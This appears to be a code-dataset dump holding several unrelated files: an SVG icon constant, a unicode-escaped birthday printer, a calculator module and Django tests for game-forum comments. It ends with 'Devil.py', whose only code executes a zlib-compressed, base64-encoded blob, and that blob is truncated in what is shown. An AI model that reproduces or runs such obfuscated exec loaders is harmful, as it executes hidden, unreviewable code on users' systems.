hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
17013762287a6697d4402a1f3e6382a1ad3d9628
| 751
|
py
|
Python
|
octicons16px/bell.py
|
andrewp-as-is/octicons16px.py
|
1272dc9f290619d83bd881e87dbd723b0c48844c
|
[
"Unlicense"
] | 1
|
2021-01-28T06:47:39.000Z
|
2021-01-28T06:47:39.000Z
|
octicons16px/bell.py
|
andrewp-as-is/octicons16px.py
|
1272dc9f290619d83bd881e87dbd723b0c48844c
|
[
"Unlicense"
] | null | null | null |
octicons16px/bell.py
|
andrewp-as-is/octicons16px.py
|
1272dc9f290619d83bd881e87dbd723b0c48844c
|
[
"Unlicense"
] | null | null | null |
OCTICON_BELL = """
<svg class="octicon octicon-bell" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg>
"""
| 150.2
| 726
| 0.679095
| 181
| 751
| 2.812155
| 0.513812
| 0.02947
| 0.011788
| 0.015717
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.527859
| 0.091878
| 751
| 4
| 727
| 187.75
| 0.218475
| 0
| 0
| 0
| 0
| 0.333333
| 0.970667
| 0.417333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca3c3a4d1b08a136d1126ee54557eeb037d00db1
| 586
|
py
|
Python
|
examples/happy_birthday.py
|
adam-weiler/HBD
|
2d5f41c8d592a0b387c5c1531e3b007e79338df3
|
[
"MIT"
] | null | null | null |
examples/happy_birthday.py
|
adam-weiler/HBD
|
2d5f41c8d592a0b387c5c1531e3b007e79338df3
|
[
"MIT"
] | null | null | null |
examples/happy_birthday.py
|
adam-weiler/HBD
|
2d5f41c8d592a0b387c5c1531e3b007e79338df3
|
[
"MIT"
] | null | null | null |
user_name = input('Please enter your name:')
print (u'\n\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079\u002c \u0064\u0065\u0061\u0072 ' + user_name + '\u0021')
print (u'\u0048\u0061\u0070\u0070\u0079 \u0042\u0069\u0072\u0074\u0068\u0064\u0061\u0079 \u0074\u006F \u0079\u006F\u0075\u0021\u0021')
| 97.666667
| 145
| 0.771331
| 95
| 586
| 4.736842
| 0.252632
| 0.053333
| 0.133333
| 0.177778
| 0.828889
| 0.828889
| 0.828889
| 0.828889
| 0.828889
| 0.828889
| 0
| 0.541367
| 0.051195
| 586
| 6
| 146
| 97.666667
| 0.267986
| 0
| 0
| 0
| 0
| 0.8
| 0.850085
| 0.71891
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.8
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 14
|
ca6c69956517b342f2e920516bfdc2ff5ea9eaf7
| 135
|
py
|
Python
|
calc.py
|
Parkdoin/python_study
|
5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f
|
[
"MIT"
] | null | null | null |
calc.py
|
Parkdoin/python_study
|
5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f
|
[
"MIT"
] | null | null | null |
calc.py
|
Parkdoin/python_study
|
5a30bc8fe3c9e6c701d01a96dbb504a5ef188c3f
|
[
"MIT"
] | null | null | null |
def add(a,b):
return a+b
def multi(a,b):
return a*b
if __name__ == '__main__':
print(add(10,20))
print(multi(10,20))
| 15
| 26
| 0.577778
| 25
| 135
| 2.8
| 0.48
| 0.114286
| 0.228571
| 0.257143
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 0.237037
| 135
| 9
| 27
| 15
| 0.601942
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.285714
| 0.571429
| 0.285714
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
f3d6bf494899c3075514f1713945a98e7d3a4a31
| 15,887
|
py
|
Python
|
tests/gameforum/test_game_comments.py
|
kozzztik/tulius
|
81b8f6484eefdc453047f62173a08f5e6f640cd6
|
[
"MIT"
] | 1
|
2020-04-21T15:09:18.000Z
|
2020-04-21T15:09:18.000Z
|
tests/gameforum/test_game_comments.py
|
kozzztik/tulius
|
81b8f6484eefdc453047f62173a08f5e6f640cd6
|
[
"MIT"
] | 70
|
2019-04-10T22:32:32.000Z
|
2022-03-11T23:12:54.000Z
|
tests/gameforum/test_game_comments.py
|
kozzztik/tulius
|
81b8f6484eefdc453047f62173a08f5e6f640cd6
|
[
"MIT"
] | 1
|
2019-04-12T14:55:39.000Z
|
2019-04-12T14:55:39.000Z
|
from django.db import transaction
from tulius.forum.threads import models as forum_threads
from tulius.gameforum.threads import models as thread_models
from tulius.stories import models as story_models
from tulius.games import models as game_models
def test_comments_api(
game, variation_forum, user, murderer, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread with "no read" and no role
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': forum_threads.ACCESS_READ,
'granted_rights': [], 'important': False, 'media': {}})
assert response.status_code == 200
thread = response.json()
# try to add comment with user
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'media': {}, 'role_id': detective.pk,
})
assert response.status_code == 403
# add rights to write
response = admin.post(
thread['url'] + 'granted_rights/', {
'user': {'id': detective.pk},
'access_level': forum_threads.ACCESS_WRITE
}
)
assert response.status_code == 200
# try again
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'media': {}, 'role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
comment = data['comments'][1]
assert comment['title'] == 'Hello'
assert comment['body'] == 'my comment is awesome'
assert comment['user']['id'] == detective.pk
assert comment['user']['title'] == detective.name
# update comment
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome2',
'media': {}, 'role_id': detective.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome2'
# try to update with wrong role
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': murderer.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 403
# try to update with wrong editor
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': detective.pk, 'edit_role_id': murderer.pk,
})
assert response.status_code == 403
# check body not changed in this attempts
response = user.get(comment['url'])
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome2'
assert data['user']['id'] == detective.pk
# check comments counters
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 0
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 1
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 2
# check role update works
response = admin.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome3',
'media': {}, 'role_id': murderer.pk, 'edit_role_id': detective.pk,
})
assert response.status_code == 200
data = response.json()
assert data['body'] == 'my comment is awesome3'
assert data['user']['id'] == murderer.pk
assert data['user']['title'] == murderer.name
assert data['editor']['id'] == detective.pk
assert data['editor']['title'] == detective.name
# check comments counters again
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 1
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 0
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 2
# delete comment
response = user.delete(comment['url'] + '?comment=moo')
assert response.status_code == 200
# and check counters
response = admin.get(base_url)
assert response.status_code == 200
data = response.json()
assert data['characters'][0]['id'] == murderer.pk
assert data['characters'][0]['comments_count'] == 0
assert data['characters'][1]['id'] == detective.pk
assert data['characters'][1]['comments_count'] == 0
variation = story_models.Variation.objects.get(pk=data['id'])
assert variation.comments_count == 1
def test_comments_illustrations(
game, variation_forum, user, detective, story_illustration,
variation_illustration):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread with illustration
response = user.put(
base_url + f'thread/{variation_forum.id}/', {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {
'illustrations': [{
'id': story_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
thread = response.json()
assert len(thread['media']['illustrations']) == 1
entity = thread['media']['illustrations'][0]
assert entity['id'] == story_illustration.pk
assert entity['title'] == story_illustration.name
# change illustration
response = user.post(
thread['url'], {
'title': 'thread', 'body': 'thread description',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {'illustrations': [{
'id': variation_illustration.pk,
'foo': 'bar'
}]}})
assert response.status_code == 200
thread = response.json()
assert len(thread['media']['illustrations']) == 1
entity = thread['media']['illustrations'][0]
assert entity['id'] == variation_illustration.pk
assert entity['title'] == variation_illustration.name
# Do illustration delete
response = user.post(
thread['url'], {
'title': 'thread', 'body': 'thread description',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {'illustrations': []}})
assert response.status_code == 200
thread = response.json()
assert 'illustrations' not in thread['media']
# try to add comment with illustration
response = user.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk,
'media': {
'illustrations': [{
'id': story_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
data = response.json()
comment = data['comments'][1]
assert len(comment['media']['illustrations']) == 1
entity = comment['media']['illustrations'][0]
assert entity['id'] == story_illustration.pk
assert entity['title'] == story_illustration.name
# change illustration
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {
'illustrations': [{
'id': variation_illustration.pk,
'foo': 'bar'
}]
}})
assert response.status_code == 200
data = response.json()
entity = data['media']['illustrations'][0]
assert entity['id'] == variation_illustration.pk
assert entity['title'] == variation_illustration.name
# remove illustration from comment
response = user.post(
comment['url'], {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk, 'edit_role_id': detective.pk,
'media': {
'illustrations': []
}})
assert response.status_code == 200
data = response.json()
assert 'illustrations' not in data['media']
def test_broken_last_comment(game, variation_forum, user, detective):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
base_url = f'/api/game_forum/variation/{game.variation.id}/'
# create thread
response = user.put(
base_url + f'thread/{variation_forum.id}/', {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {}
})
assert response.status_code == 200
thread = response.json()
# break last comment
obj = thread_models.Thread.objects.get(pk=thread['id'])
obj.last_comment[user.user.pk] += 1
obj.save()
# check room view still works
response = user.get(base_url + f'thread/{variation_forum.id}/')
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['threads'][0]
def test_delete_game_comments_with_thread(
game, variation_forum, detective, murderer, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# create room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'thread', 'body': 'thread description',
'room': True,
'default_rights': None,
'granted_rights': []})
assert response.status_code == 200
room = response.json()
# create thread
response = admin.put(
room['url'], {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': detective.pk, 'media': {}
})
assert response.status_code == 200
thread = response.json()
# create second detective comment
response = admin.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': detective.pk,
'media': {}})
assert response.status_code == 200
# create murderer comment
response = admin.post(
thread['url'] + 'comments_page/', {
'reply_id': thread['first_comment_id'],
'title': 'Hello', 'body': 'my comment is awesome',
'role_id': murderer.pk,
'media': {}})
assert response.status_code == 200
# check comments counts
assert story_models.Role.objects.get(pk=detective.pk).comments_count == 2
assert story_models.Role.objects.get(pk=murderer.pk).comments_count == 1
# delete room
response = admin.delete(room['url'] + '?comment=die')
assert response.status_code == 200
# check comments counts
assert story_models.Role.objects.get(pk=detective.pk).comments_count == 0
assert story_models.Role.objects.get(pk=murderer.pk).comments_count == 0
def test_game_comment_counters_on_rights_change(
game, variation_forum, user, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# create room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'room', 'body': 'thread description',
'room': True,
'default_rights': None,
'granted_rights': [], 'role_id': None, 'media': {}})
assert response.status_code == 200
room = response.json()
# create room
response = admin.put(
room['url'], {
'title': 'thread', 'body': 'thread description',
'room': False,
'default_rights': None,
'granted_rights': [], 'role_id': None, 'media': {}})
assert response.status_code == 200
thread = response.json()
# check initial state
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
response = user.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# close thread
response = admin.put(
thread['url'] + 'granted_rights/', {
'default_rights': forum_threads.NO_ACCESS})
assert response.status_code == 200
# check counters, admin still see
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# but anonymous user is not
response = user.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['rooms'][0]
assert data['rooms'][0]['comments_count'] == 0
def test_game_comment_counters_on_thread_delete(
game, variation_forum, user, detective, admin):
game.status = game_models.GAME_STATUS_IN_PROGRESS
with transaction.atomic():
game.save()
# Create room in root room
response = admin.put(
variation_forum.get_absolute_url(), {
'title': 'room1', 'body': 'room1 description',
'room': True, 'default_rights': None, 'role_id': None,
'granted_rights': []})
assert response.status_code == 200
room = response.json()
# create thread
response = admin.put(
room['url'], {
'title': 'thread1', 'body': 'thread1 description',
'room': False, 'default_rights': None, 'role_id': None,
'granted_rights': [], 'media': {}})
assert response.status_code == 200
thread = response.json()
# check initial state
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert data['rooms'][0]['last_comment']['id']
assert data['rooms'][0]['comments_count'] == 1
# delete thread
response = admin.delete(thread['url'] + '?comment=wow')
assert response.status_code == 200
# check counters
response = admin.get(variation_forum.get_absolute_url())
assert response.status_code == 200
data = response.json()
assert 'last_comment' not in data['rooms'][0]
assert data['rooms'][0]['comments_count'] == 0
| 39.618454
| 79
| 0.605967
| 1,805
| 15,887
| 5.171745
| 0.072576
| 0.05699
| 0.081414
| 0.097697
| 0.832458
| 0.799036
| 0.78661
| 0.774076
| 0.764542
| 0.743546
| 0
| 0.014974
| 0.247561
| 15,887
| 400
| 80
| 39.7175
| 0.765936
| 0.056335
| 0
| 0.803468
| 0
| 0
| 0.204267
| 0.014849
| 0
| 0
| 0
| 0
| 0.274566
| 1
| 0.017341
| false
| 0
| 0.017341
| 0
| 0.034682
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f3f169c8c45321f9a839bffa06b487aeb8e6ba32
| 16
|
py
|
Python
|
tests/test_files/commented_names.py
|
atuchak/flake8-variables-names
|
10915c2c0cdd4ed5ef879b5f57ef55894219150b
|
[
"MIT"
] | 43
|
2019-03-23T06:59:05.000Z
|
2022-03-16T16:34:44.000Z
|
tests/test_files/commented_names.py
|
atuchak/flake8-variables-names
|
10915c2c0cdd4ed5ef879b5f57ef55894219150b
|
[
"MIT"
] | 8
|
2019-04-04T01:09:45.000Z
|
2022-02-24T12:42:14.000Z
|
tests/test_files/commented_names.py
|
atuchak/flake8-variables-names
|
10915c2c0cdd4ed5ef879b5f57ef55894219150b
|
[
"MIT"
] | 10
|
2019-03-23T06:59:09.000Z
|
2022-01-28T12:50:55.000Z
|
# a = 0
# b = 1
| 5.333333
| 7
| 0.25
| 4
| 16
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.5
| 16
| 2
| 8
| 8
| 0.25
| 0.6875
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d34d45d590071b981fdc0c89e47ad6f7fd01515
| 18,397
|
py
|
Python
|
Devil/Devil.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
Devil/Devil.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
Devil/Devil.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
#Original Written By Qaiser
#Youtube : Tech Qaiser
#Github : https:github.com/TechQaiser
import zlib,base64
exec(zlib.decompress(base64.b64decode("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